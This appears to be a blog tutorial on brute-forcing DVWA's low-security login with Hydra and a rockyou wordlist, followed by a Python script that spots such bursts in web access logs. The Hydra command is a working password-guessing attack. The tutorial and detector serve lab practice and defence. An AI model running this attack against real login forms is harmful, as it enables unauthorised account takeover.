DVWA Brute Force (Hydra)

Today's post is a quick example of how to brute force a low-security login form on the DVWA machine using Hydra.

You will need

  • Kali Linux
  • Hydra
  • DVWA
  • Burp Suite
  • Wordlist

First we need to capture the login request with Burp to get a cookie and a response, so we can see how the page responds to a failed login.

Fire up Burp and capture the request

[Screenshot: the captured login request in Burp, 2018-07-10 17:04]

This is all we need from Burp: it gives us the parameter names, the URL and the cookie for the attack.

Next let's use Hydra. Open a terminal and type the following command, replacing <dvwa-host> with the address of your DVWA instance. Make sure the URL is correct (it is case sensitive, as is the failure-message string), or Hydra will report false positives.

hydra -l admin -P /usr/share/wordlists/rockyou.txt <dvwa-host> http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rf0uoeqqtio083hl4opmmq2j57"

Execute the command and, if you used verbose mode (-v), you will see each response as Hydra works through the list; once it succeeds, the valid login will be highlighted in green.

That is it for Low Security!
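From the defensive side, the same traffic is easy to spot in the web server's access log: every guess is a GET to /vulnerabilities/brute/ with username and password in the query string, and DVWA answers good and bad guesses alike with HTTP 200 (which is why the Hydra command keys on the response text rather than the status code), so the signal is volume per source address. The Python script below is an added example, not part of the original post nor of DVWA or Hydra; it parses constructed combined-format log lines (the IPs, timestamps, usernames and passwords are made up) and flags any (source IP, username) pair that submits five or more guesses inside a sixty-second sliding window. The log format, login path and thresholds are assumptions to adjust for your own server.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Assumption: the DVWA web server writes Apache/Nginx "combined" log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/vulnerabilities/brute/"  # the DVWA form targeted above

# Constructed sample lines (not real traffic): six guesses for "admin" from
# one address within 30 seconds, one ordinary login from another address,
# and a non-login request that must be ignored.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2018:17:04:16 +0000] "GET /vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4915 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2018:17:04:17 +0000] "GET /vulnerabilities/brute/?username=admin&password=12345&Login=Login HTTP/1.1" 200 4915 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2018:17:04:19 +0000] "GET /vulnerabilities/brute/?username=admin&password=123456789&Login=Login HTTP/1.1" 200 4915 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jul/2018:17:04:20 +0000] "GET /vulnerabilities/brute/?username=alice&password=abc123&Login=Login HTTP/1.1" 200 4880 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2018:17:04:22 +0000] "GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4915 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2018:17:04:30 +0000] "GET /vulnerabilities/brute/?username=admin&password=iloveyou&Login=Login HTTP/1.1" 200 4915 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2018:17:04:46 +0000] "GET /vulnerabilities/brute/?username=admin&password=princess&Login=Login HTTP/1.1" 200 4915 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2018:17:05:01 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""


def parse_login_attempt(line):
    """Return (ip, timestamp, username) for a credential submission to the
    login form, or None for any other line (or an unparseable one)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != LOGIN_PATH:
        return None
    qs = parse_qs(parts.query)
    if "password" not in qs:
        return None  # plain page view, no credentials submitted
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    user = qs.get("username", [""])[0]
    return m.group("ip"), ts, user


def find_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return [(ip, username, max_attempts)] for every (source IP, username)
    pair whose guesses reach `threshold` inside any sliding `window`.
    The HTTP status is deliberately not used: DVWA returns 200 for a wrong
    password too, so only the rate of submissions distinguishes a brute
    force from normal logins."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_login_attempt(line)
        if parsed:
            ip, ts, user = parsed
            attempts[(ip, user)].append(ts)

    alerts = []
    for (ip, user), times in attempts.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it fits within `window`.
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append((ip, user, best))
    return alerts


if __name__ == "__main__":
    for ip, user, n in find_bursts(SAMPLE_LOG):
        print(f"ALERT: {n} login attempts for '{user}' from {ip} within 60s")
```

Run against the sample it reports one alert, for 10.0.0.5 guessing "admin"; the single login from 10.0.0.9 stays below the threshold. Keying on (IP, username) rather than IP alone keeps a shared NAT address from drowning out a targeted account, and the sliding window means a slow, steady attack still trips the alert once enough guesses land within the window.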
